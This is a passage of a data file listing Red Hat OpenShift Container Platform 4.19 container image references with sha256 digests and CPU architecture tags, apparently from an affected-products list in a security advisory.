"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:5727ab378cdf09a1eb20b6120da5ee6d66a1473ea0d7dfd0709faf5c53df615f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:d85ca66233c95a4b622d97b50ae304dab7cd3ea67efbc40ab9ddb723478104b7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:f26b039b69b5d006e04148dd4e7d6bcada2ae22c8892e094e43c6bb307a99cea_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:1f2b394a49751e0cbc81a776a8abefaee56aea8a2449a56f66ec4fb8bd7b36a0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:5a3bb13d5a7dfd660ce6ca1799af07ff0eb73148a51b3e5864fda09650186530_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:a676ed9f3d05a12ca0965f8b33d002d95cc8578f5a74f0bcf984594d784b0e3c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:dbd96ce5c1082dd3f2de07bd34f805d64952bee798cd96f2d9f94d195acbfd2e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:0104fa2a05916db8ce121350b3e026a74891560be71999451943090f63d727a2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:590caaaf15b7a11ce69df24820ddc1f4b0b7a1c7cc5d2e62e2c3bfd35a5bb733_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69d052085b27f034e581680b283ed51134f2d8d5c895f0b2984946c158304249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69f33223ac1b30068c884ba58ef4f04545ed5d02dab43dd525ff3f66c299885f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:0beec3d7cd2663215fbfd97490b8aa1a684580e273dd9161d574f3ce5fe936b5_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:19636219d56bc03c8641e266ed3d82cae94bd7431e3da0c48ccba9bfb541ef6f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:2ad51487bd9dd02bdabe506d2c5758a9e9df2903a8a63d1a19d720281390eebc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:7c081487e39de209265d2bb960fb68fa2997e1620f37bdd3bb1aac57483bbbe7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:13560a7a1ab60ebe5a593c4c6819d730f1e8fad5031a5a38b7aa8ebcb52776b9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:4f90910be0a33320bf234e3c25b6c364a0e730d76be53fc8c7e50227c14e25e2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:7406a10e78b85749cd597d3ced8b69a87a7931119611e996dd8cd660ff1ac47c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:d710074f9ebfa1ec4e15c5ee4718b748259f8907f4ec0aa56045c00cf19a691c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:6bf2ac59bb7ee40409082d564bde5d5568be09bd21219fe0c62ebc6624912b1a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:8ad00ec95b55f781061f47a2b0b7b2ae6e557bb9cdbad826c097fde6a5b7d791_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:3dc93509b8cad942ffeea32ba1c75db4b94a66a8c1a6d7b29f13ed6ec83e5f9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:ae91dc01aca5115ba88290f86ab266ad69b86c68c83097adafb82defdfc5c524_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:67f9c3e3f77df4be9e4925fe7c5fb4cb95d770395bbb1b32847c7100d8f9e8fe_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:ef09a660c5bd1b44464ed961ade4f9ceef47dfe1005efde15de94631dadebf4f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:d1a5ebdd8e8fcd15749e48a18cf340a309c6c219c8adf85d2df1caa773784d86_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:de7f8ba8b4ed81e733af2d6b40e2dbb97c7afdc627973bfb838bd69ed9183eba_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:15b866541c161693e74ad7106aec45b9713f81e1f3e2f10deb0822b58fbb884e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:240132f7cf6ec28b4f711323b5c9f10ba76e85ba0ed2e66c663096089fdcc128_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:2191714083728cc0984775c5b8c3ee972723c1378058f0923ab60036345d9825_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:249b48b699ef21517d11a3533293184b1524b5907fec00593a98f0581363dc12_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:660ad818c22efdd4fb965ded889c7ed08b331cb8d50c145bd4a34e74158f790a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:deb01110f819b3534a2bd24b5406c69bcf5011eaebdeec438a31f1cd68f18029_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:255b3979a3a054696f21f437998c892b5738cbbcdc021b0a22752f1d9bb48712_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:d665a06a23572a2bcf3345f9c22b2b9895292e1f43d5532b793a3ea4df0c42c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:086285dd82aadc71803c847a06a2e0727b4fbb09f07a5bf95979ebc50bb95e82_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:0f5c719b22dbba95b6d61db0c63ba8107689a7d61f6944e0d2dc5fa3e693d25e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:1452416d5cfd9acae6f0bf60da783ec8cf632784655f4602462cf380cd7fe518_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:b13a67c30437a6950f41cdda853305d03ac24809746bdca955782db1c59824b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:43f58c25df6d439ab60c6a7fd905db92d67678bf55732103069b9d3ce9a6ee1d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:5eca83117e60a69246033c3cedcc2e2962e0f0a6ae6d6d7e3c35546cdc78ce70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:daddd3f94f513bfce03ea0c5aa406164838aa7bc41c3251b02686fd86da09d7a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:f1a3870617f3e6c0774b5484820351c404cabe3161684c6edf3b81554cf9f1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:4f54884bb854edec3a1a28ba089ddc068edc3ad0677637dd9b033a1c0ff8052c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:834a2b63a74d7af617155da8f25a36f196b7c16a78154468b1cb88a10fdfa88d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:3f79fe8b748ce5015d5d71ce8da20bbff7241868e87066d1d50083a3ceb91bfe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:66745a12cf917414d197c589e7e57a62958da4c66d5372e848e40568d8ddfafc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:900e5ff2f8ea86f0864c6a3cd1707a620427189f5bfffa0bb0ea9a8c0ed85330_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:c029ff100811f13c0ba79c03044e0c6f096567511c336e4d1ecced6e900c2acd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:37fe6420e98e7d1927492a7a40fd01578cfaf441530b7bf2f85cc7d593d7b097_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:480d7e114879e0c9bcfd62250af7f2f7b4a25e7d4cca65d97c422349fe164334_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6f49794879ad8a54b4a9ba77661ebdf84cb90a048d1472c1f878c10a9ecc46e6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:77c778debce0cb2eff5f5e66a3db3e30905e0138de3ddc3cd5330d2a79ec2cf9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:6aef6b3ea8ceb252107d24252c9c155e21d42825343e2a824d869f897a86da4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:895cb0d9b4715a75c1ffa4539bbd86c14f774e664ab16f5df4bc3e55ef537225_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:99fc0e641a6014bad4027471174578ba22c0a4a99c05b6bca1e8c838bbda0a90_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:aee32f17c4c4aa3deaca4a1884efc7c1a05d4fdadea145b247c4364e9e82086a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:07f2b6c01f22078c6b6eea7916982ebfcf6f992daf0d80af7b18972e6c484868_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:3efbeb0ba231cc16b69a86c43c28aa02b7e773413b361ceaf82c72cb215dc187_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:a212996fe27771f82406dc36d68e07e29ecf975834c3cde6395b35cd259edbe9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:b7f1f48335150e9e3ff89c0c349345f2c7fb6d7cf27793d263cca791d53f260c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:39852b09d2ff95f03cff6f39398c67d30d64366f00a0ca73319d81831b7f6e23_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6d2dbe2a871324b770da093074a9fcac3aa590896e366354f8202bf80eae70ed_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:9df2c55943c62172a5ab42fcd2309a232a8e455240efeba614e2e70308972764_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:e6aaec6333f15e8aa67ad391f57eb7225007c068947982d18fea6b90d837e6e2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:02c4fe2761b586f29c78d9419f0b90d98bee92b8d4fa47ec77dfe45795fab7fb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:4b1a4e3c67e3fc5c14a8cb7130eec3ea191f27473942f7afb09b497a30236947_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:a9e099fe57f31d4e86d0edbad9605aae421fbe410d1b7c2f6e7036940ba5e319_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:e3504f1bb6b8b89f4f01ecefc3c8646cbc949d638bfa6db0638476731d9f0e96_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:1cdfe759fe6d9b1745276957b712c1a46a69ce1c59706a7ba9ca8f3f89cc844d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:2fafd2b4c0fb8500c0180c767e55f70d26203e68500e64d252fe3a10227a161a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:5a96f6965efd6579efde9b1a1b4ae88b57cbb49f38cf2a39ef90a55470a30667_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:95c126293ef394a5ce8882e8cfa9c6f6c22e9cae79e64e07f0e1e57a8fb55211_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:4e885357cb52fffbb832d31d97400cfc629f26d5c38b4692379d08ba485f46d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:645168f7cb91679d374bc1e431181a1b964dec279265ec52e5809b368e08654c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:7c20e19cdbb62a268ffea39d5e0004fb4e6b587c41250c73180043f56b9fe0e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:c17396793e30858f900b68ed2981f38062d501b7600a5e4ca127d4e14113aca4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:56453e8ce0dbb39d0259d2f0b36f58d8f049bf6c1a880b8a1eaa37d8ade32067_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:6513461d1b413d648dc1d2327fac029633f5d34322459f2752d1096648fa37b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:9a083427c52dcc2f9716408cf23991613eef7c41fb6eb1ee4841491276971039_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:dcfe6ab706950430187a24e9792b6f0c270f813841e799ea7e35623679269ae5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:334e975b0d8a94ec45ade469bf86809c9a07e9456cda5d5c71d6f91a2877faa0_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:64dfc7beaf3a8cfdab85ba963db74971ca68b6cf614aa04279f4af3239806e4c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:7b99d625b14ced1fd44520bd106906dd60f84e7794257fe3b4d3a3aa685ebbbc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:8b854d27a269e0f6b6d542f652c504ab0678ac18d1b84db63078257eebe090cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:2601add0c23c9e27079274736508adab64c6ae4128f66a53df3f569fe2d9fe3f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:6917cb0e3b073a13ec29e5c329f01cf2ec26e78d47c3c8360d0063d186a4ba53_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a400d84e7f46869a2c2f75b6f221684879b680910b5e5e4662e074a020483cf4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:d94b765497d2fa316fbf4ec374572a5fba96a99b78dfe02b6ed6986e2b7782e6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:26b8049bd1a84ed402fad985ca842bf91ba86fbc5e46f7dea0050120ca551643_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:4c28562416c8308c00af299859adfd3cfb4ef790ef2b6668299dc487c6fa3f45_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:645feaaa568676e0c2b1c620a81a1a60d321800b940d46d2514aa59e1f25e2c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:78bdc6e0ac3da2daf1f39e07c6554ac500deec9670561477f9cf0a346e1145bf_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:59b6c20394bfa15bb36a9ac9b4ef03ae6bdadfcfd110c46fee13ac2abc9f6fa3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:79a30df8b6d7ef52409a3145663550ccf0fbde7e5bffc7e91ccefe2f276e44af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9324047c73a33a920fe6403604cd123f81dc7663c4780934f4da3b95f0bb5bac_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:960007197db71f1b34bdeadf7bc13323cff680b273f795dfcffc569867f695b2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:0685735bcfb4c4a112c1796dcfccf10233e0e62e1538520aa6e02abf8dd88c27_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:12bfb2d2bbc5c7bbf8a161f97c1521d0a5c7ef8ad6e3aca825e62cf066a51109_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d9a9c57749c9d3e56e51d0b67ac5929949a900b1e6c96a4414366afc1ef4ba3b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:f3650443d49b825783ed4f308ff994be4b24c86dee1e2825274d58e0d4b02a28_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9d90ec3d15ade36e666eee154f9b934259cf811b4a9f987ef18300b78bbe35d3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9feb86c7f0170dfae9273fe7e3ba662b7333ce8d05ee411b9e7d9c82447b2f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a1bc835a8621c88b52ddff53d6701b5cefe7cc6f2efb80836c239cb333945043_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:e53bfa8ab4ae569c697bba0b37c25afb495cc6cf324fb4ed50bd8ffc737c04f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:1264333969e9e7825b6ece8ed3a80a3eeac54564ae51d2aed817e4028fbef931_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:aa2f9d5b3b26615c429128234a5dea3cfa7f4f6d5ce3d9d4e6bf6796bafbb50b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b2115e5268813615088ca48f0138ff6910b07513be4177cd74485d2d41f0e249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:c8e791718d7e4a68571b873bd0c68aeffc217fe69ee7e74741ecda295fb67dbd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:290f5dcc66373ff79cbcda33e6fbba989c48ae2bf8b623c57e065110e36524db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:572cc6f2f303a9190588696d5bdc80fca9ac3c32d5de9c5d94a27861c871a1c5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:d1561efe3cc68b60fbfc765e028dee3cf4a7666dc499f028c98603075d99a9d7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:e04cc25c77ffb05e86a6fea6dc8a6e5c35563612305adbcb98cd0b4832c97ed1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:96fdf677680bf809356060d0af7fc9166608de5dc4d546e671f3071910558381_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a13951576eb84ab6c6d3b800976320f8bebadad21e49b38faa99e8d1adcc520f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a8ce501ca7269a42fbb749fd0d3adb03c49468282e1f41e483e569c8acc1f777_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cd0bb571991f485f4f33aadb8434e1d5e3b6c3bf7ac4e1e62994de0b190b6ec6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:0c5df10c40e0bfbed23f193b9aedaf953a5e1e3f4cbbe5f1924866d1ec7f55cf_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:4cdff720094bd0b07e3dd6ae9b5b88756a890fd1ac39361629c44817766fe69e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b28fe78ee564e859188499e768d57e3e0fe2ad0afb715b0d76ce0c99960f3cd1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:eb91a50e029bf839ff7be93783acbbd5ea72ba6f3bf9f9dc10c0588c23280f51_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:0ac703dd7441374f349bfeb3639c1a7e364c9764aeb4b9ac05ea7879cce4a5a1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:4b6155be40a57801b21c44a7b50f89801b15dba8a51dad03969b25bee1a22b6b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:adedcc1ce23f14f3759818cddb9dbbe73dc1f772e3b58e229433f7b6e2f0f5b8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:e81081ad64219f09b1eef538df2903264d087d898aa81bebb6634fe4342efc59_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5185785b29d581adb9e8ed4e23ba11c7d67090f4c6e59b0287d2a36c83fd8ae1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:582a1302e53fa201431ccd497816d939ed23590d6d4128cb281a03fcf90f9475_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5d920d843fb0958a750b86ee532642adc3a77f5e060d54cfa5327e4f41465772_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:cfe7eed06e5855c82c72a26bad2c2354091e94c51b692637cd8e79027ea6742a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:73738cc655778a94527afe3ae48c4ca932590e4f78f03811f70d2d35f5090d3e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9673f610031257e254dc32e569b3471168e5c18a352ad5bddc9bd51e686eb4e6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e61ccfe3880e902a0e1cb9e718f62cbf57ce70435092f90f19e441fba2e899d1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f66818672229085d1982f4b0053c75d26e6faa4893331f6024b33f953426339d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:1d89f84175f9a72d05074562aeacda38b9047a99974a186a8a4d2d72e20c92f1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3e6c6be12aadf59c05c9a2da262846e6a44be09351ad81b8891fefa6a3f93f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:cf1445e8c39362b8c0b4b29d56771dcdb15f99c71e922e3fddd6b1f7e7b275bc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:d83d30e35ee380e6003d2ee8b5a56a21ea892037b978273d1ff4a8e1ce88c360_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:2ae0fbcbb1b67e11e64b526fae84e06219478f5ea8e474223525cfd4ebd8a39f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:41acc32b9acd74f09fb1e01b77c0fa3c64a891c96cf2549b54b6e0d43411ffb2_arm64",
